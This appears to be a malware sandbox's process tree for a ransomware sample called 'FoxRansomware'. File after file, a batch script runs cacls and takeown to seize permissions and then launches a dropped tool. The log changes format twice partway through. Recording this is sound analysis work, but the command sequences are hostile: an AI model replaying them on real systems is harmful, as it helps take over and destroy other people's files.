    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1" | PID:4368
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "settings.dat.LOG1" -nobanner | PID:2544
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "settings.dat.LOG1" -nobanner | PID:3500
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:4188

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"" | PID:7412
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C | PID:1372
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" | PID:5384
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "TileCache_100_0_Data.bin" -nobanner | PID:5300
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "TileCache_100_0_Data.bin" -nobanner | PID:388
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:3596

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"" | PID:5364
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C | PID:2560
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" | PID:3332
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "background.png" -nobanner | PID:4316
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "background.png" -nobanner | PID:6304
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6108

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"" | PID:4352
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C | PID:1056
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" | PID:2992 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:5452
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:2272
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6460

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"" | PID:7236
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C | PID:5696
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" | PID:3652
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:6228
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:5656
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:3192

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"" | PID:2444
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C | PID:6568
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" | PID:6564
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner | PID:5136
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner | PID:6572
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5524

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"" | PID:4596
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C | PID:5844
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" | PID:5976
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner | PID:6004
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner | PID:6900
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5732

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"" | PID:5928
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C | PID:5380
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" | PID:7624 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "RoamingCredentialSettings.xml" -nobanner | PID:5832
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "RoamingCredentialSettings.xml" -nobanner | PID:1320
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5440

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl"" | PID:6188
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" /E /G Admin:F /C | PID:6172
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" | PID:6848
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" -nobanner | PID:6284
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" -nobanner | PID:1448
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5404

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"" | PID:8096
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C | PID:5184
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" | PID:5216
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000006S.bin" -nobanner | PID:4572
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000006S.bin" -nobanner | PID:1008
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:2188

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin"" | PID:2620
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" /E /G Admin:F /C | PID:6100
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" | PID:7276
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000076.bin" -nobanner | PID:5328
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "00000076.bin" -nobanner | PID:7204
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6164

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin"" | PID:1504
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" /E /G Admin:F /C | PID:7280
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" | PID:6180
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007G.bin" -nobanner | PID:5332
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000007G.bin" -nobanner | PID:7328
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6244

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin"" | PID:7388
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" /E /G Admin:F /C | PID:7364
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" | PID:7292 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007Q.bin" -nobanner | PID:7672
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000007Q.bin" -nobanner | PID:7968
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:696

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin"" | PID:7396
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin" /E /G Admin:F /C | PID:8044
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin" | PID:7884
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000008F.bin" -nobanner | PID:7908
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000008F.bin" -nobanner | PID:7332
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:7736

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin"" | PID:7732
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin" /E /G Admin:F /C | PID:7948
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin" | PID:8080
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000095.bin" -nobanner | PID:7500
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "00000095.bin" -nobanner | PID:7496
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:7936

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin"" | PID:8188
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin" /E /G Admin:F /C | PID:5480
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin" | PID:4828
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000A0.bin" -nobanner | PID:2980
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "000000A0.bin" -nobanner | PID:6652
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6576

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"" | PID:4548
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C | PID:6936
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" | PID:8172 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "device.png" -nobanner | PID:5804
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "device.png" -nobanner | PID:5864
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:7068

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"" | PID:6544
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C | PID:6740
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" | PID:6524 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:4752
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:6860
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:5768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:4064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:6996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "tasks.xml" -nobanner3⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "tasks.xml" -nobanner4⤵PID:6804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""2⤵PID:6520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C3⤵PID:2408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"3⤵PID:6884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "DesktopSettings2013.xml" -nobanner3⤵PID:6484
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "DesktopSettings2013.xml" -nobanner4⤵PID:6624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6892
-
-
-
level 2 | PID 6920 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
  level 3 | PID 1492 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C
  level 3 | PID 5756 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
  level 3 | PID 4664 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
    level 4 | PID 7876 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
  level 3 | PID 2348 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 3088 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
  level 3 | PID 4536 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
  level 3 | PID 5204 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
  level 3 | PID 4272 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
    level 4 | PID 5220 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
  level 3 | PID 4432 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 7120 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml""
  level 3 | PID 5492 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
  level 3 | PID 5372 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml"
  level 3 | PID 7404 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "VdiState.xml" -nobanner
    level 4 | PID 4188 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "VdiState.xml" -nobanner
  level 3 | PID 7112 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 1076 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl""
  level 3 | PID 2984 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" /E /G Admin:F /C
  level 3 | PID 5436 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl"
  level 3 | PID 388 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" -nobanner
    level 4 | PID 6016 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" -nobanner
  level 3 | PID 4912 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 6816 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  level 3 | PID 2920 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
  level 3 | PID 5612 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
  level 3 | PID 4316 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "superbar.png" -nobanner
    level 4 | PID 6872 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "superbar.png" -nobanner
  level 3 | PID 4364 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 5324 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  level 3 | PID 5716 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
  level 3 | PID 6308 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" | Modifies file permissions
  level 3 | PID 2992 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner
    level 4 | PID 4836 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "resource.xml" -nobanner
  level 3 | PID 2788 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
